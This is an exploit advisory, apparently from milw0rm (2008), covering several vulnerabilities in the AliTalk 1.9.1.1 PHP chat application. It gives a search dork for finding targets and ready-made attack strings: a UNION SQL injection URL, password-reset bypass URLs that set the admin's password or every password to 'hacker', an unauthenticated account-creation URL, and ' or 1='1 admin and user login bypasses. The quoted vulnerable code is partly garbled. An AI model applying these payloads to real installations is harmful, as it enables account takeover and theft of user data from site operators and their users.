###################################################################### # ALITALK v 1.9.1.1 Multiple Vulnerabilities # # author : tomplixsee # # google dork : POWERED BY ALITALK # # download : http://www.alilg.com/software/free-php-ajax-chat/ # ###################################################################### ################# # SQL INJECTION # ################# # you need to login in order to exploit this vulnerability # vulnerable code on inc/receivertwo.php # "; # echo" r%#dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d # r%#dtd width='19'b*%d r%#dimg src=\"pix/room_user.gif\"b*%dr%#d/tdb*%d # r%#dtd class='roomuser'b*%dr%#dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%#d/tdb*%d # r%#d/trb*%d"; # $rmusr++; # echo""; # } # .... # ?> # # example: # http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400 ########################### # PASSWORD CHANGE BYPASS # ########################### # vulnerable code on functionz/usercp.php # # examples: # http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker # this will change password to "hacker" for user with uid = 1 (admin). # # http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker # this will change ALL passwords to "hacker". ############################ # USER REGISTRATION BYPASS # ############################ # vulnerable code on inc/elementz.php: # # example: # http://target/path/inc/elementz.php?lilil=400&ubild=hacker&pa=hacker # this will add an account with username=hacker and password=hacker ############################# # ADMIN LOGIN SQL INJECTION # ############################# # code on admin/index.php # # # vulnerable code on functionz/first_process.php # # # admin login page= http://target/path/admin # example: # admin ID = adminusername' or 1='1 # password = whatever ############################ # USER LOGIN SQL INJECTION # ############################ # # example: # ID = an_userID' or 1='1 # password = whatever # milw0rm.com [2008-01-16]